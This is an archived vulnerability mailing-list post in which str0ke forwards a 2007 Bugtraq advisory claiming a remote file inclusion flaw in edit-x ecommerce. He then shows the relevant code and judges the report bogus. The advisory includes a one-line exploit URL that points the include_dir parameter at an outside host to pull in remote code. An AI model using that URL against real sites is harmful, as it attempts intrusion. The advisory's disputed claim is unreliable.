[VIM] Fwd: edit-x ecommerce (include_dir) Remote File include
str0ke
str0ke at milw0rm.com
Tue Jan 9 21:31:10 EST 2007
---------- Forwarded message ----------
From: emel_gw_ini at yahoo.com <emel_gw_ini at yahoo.com>
Date: 9 Jan 2007 21:36:33 -0000
Subject: edit-x ecommerce (include_dir) Remote File include
To: bugtraq at securityfocus.com
============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: edit x
# Vendor : http://www.edit-x.com
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and all #hitamputih crew
[[inject]]]---------------------------------------------------------
on file editx/edit_address.php
$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
require_once("../ups/upsavs.php");
exploit :
http://target.lu/[editx
PATH]/editx/edit_address.php?include_dir=HTTP://injekan.lu?
[[End]]-----------------------------------------------------------
This is pretty much what the file looks like
ob_start();
$db_edx_host = "localhost"; // Database Hostname
$db_edx_user = ""; // Database Username
$db_edx_pass = ""; // Database Password
$db_edx_name = ""; // Database Name
$high_traffic = "N"; // Persistant Connections
$edx_index = "index"; // Default PHP File
$php = "php"; // PHP File Extention
$cda_dir = "cda"; // CDA Include Folder
$include_dir = "include"; // CMA Include Folder
$directory = ""; // Install Folder
$smarty_dir = "smarty"; // Smarty Folder
$template_dir = "template"; // Template Folder
$caching = "N"; // Caching
$debug_flag = "Y"; // Debug Flag
$debug_file = "debug.txt"; // Debug File
$edx_key = "editx_key"; // Decrypt Key
include('../cda/constants.'.$php); << doesn't seem to have anything
that makes this vulnerable.
$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
Seems to be another bogus.
/str0ke
More information about the VIM
mailing list